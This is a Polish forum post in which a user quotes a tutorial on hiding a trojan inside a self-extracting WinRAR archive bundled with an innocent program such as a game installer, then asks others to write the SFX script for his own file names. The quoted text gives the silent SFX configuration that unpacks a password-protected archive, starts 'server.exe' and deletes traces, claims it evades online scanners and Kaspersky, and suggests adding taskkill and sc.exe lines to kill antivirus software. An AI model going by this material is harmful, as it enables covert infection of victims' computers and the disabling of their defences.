ShadowSSJ2
Użytkownik
- Dołączył
- Sierpień 28, 2006
- Posty
- 4
Chodz o ten cytat.
No wiec rozumiem to tak:
Musze miec 2 pliki wykonywalne, trojan i cos co sie otworzy.
Nie wiem tylko jak z tym commentem SFX.
Path=%systemroot%
Setup=%systemroot%system32cmd.exe /c start /min %systemroot%system32cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -pHASELKO trojan.rar&start server.exe&del unrar.exe trojan.rar
Silent=1
Overwrite=2
Powiedzcie co oznaczaja te trojan.rar server.exe del unrar.exe.
Zalozmy ze moj trojan nazywa sie serwer.exe, plik 'czysty' ktory sie otworzy to ots.exe, a 'archiwum' bedzie nazywalo sie tak.rar/czy tam exe.
Napiszcie mi jak ma wygladac comment z tymi moimi plikami co napisalem wyzej.
Prosze o odpowiedz.
Na ten pomysł wpadłem już kilka miesięcy temu, i miałem na celu 'obejście' tylko skanerów online. Ostatnio, zauważyłem że podziałało to nawet na kaspersky av (podobno najlepszy). Połączenie plików polega na zaszyfrowaniu kodu, i spakowaniu go razem z innym plikiem (np. instalką jakiejś gry). Nie musisz znać ŻADNEGO języku programowania! Co potrzeba? Winrara, jakiegoś trojana i innego programu.
Jak się za to wziąć:
1. Generujemy server trojana, i jeśli ma opcje zabijania AV, odznaczamy ją.
2. Bindujemy server winrarem zakładając hasło i zaznaczająć 'szyfruj nazwy plików'.
3. Bindujemy już zaszyfrowany plik, moduł rozpakowujący winrara - textowy unrar.exe, oraz plik z np. grą.
4. Tworzymy SFXa:
Kod:
Path=%systemroot%
Setup=%systemroot%system32cmd.exe /c start /min %systemroot%system32cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -pHASELKO trojan.rar&start server.exe&del unrar.exe trojan.rar
Silent=1
Overwrite=2
- wiadomo o co chodzi.
5. Zmiana zawartości pliku: np. ikonka.
Sposób sprawdzony, na 100% omija skanery online, 50% kasperskiego.
Można oczywiście do skryptu sfx dołączyć kilka linijek killujących av takie jak: nod32, avast, bitdefender, avg, arcavir, mksvir, kerio personal 4, i wiele innych - da się: sc.exe i taskkill.exe wystarczy (można nawet dołączyć do paczuszki).
Jeżeli AV nie ma heurystyki, oraz nie stosuje iniekcji dll w procesy systemowe - nie ma szans z takim pliczkiem Very Happy[/b]
No wiec rozumiem to tak:
Musze miec 2 pliki wykonywalne, trojan i cos co sie otworzy.
Nie wiem tylko jak z tym commentem SFX.
Path=%systemroot%
Setup=%systemroot%system32cmd.exe /c start /min %systemroot%system32cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -pHASELKO trojan.rar&start server.exe&del unrar.exe trojan.rar
Silent=1
Overwrite=2
Powiedzcie co oznaczaja te trojan.rar server.exe del unrar.exe.
Zalozmy ze moj trojan nazywa sie serwer.exe, plik 'czysty' ktory sie otworzy to ots.exe, a 'archiwum' bedzie nazywalo sie tak.rar/czy tam exe.
Napiszcie mi jak ma wygladac comment z tymi moimi plikami co napisalem wyzej.
Prosze o odpowiedz.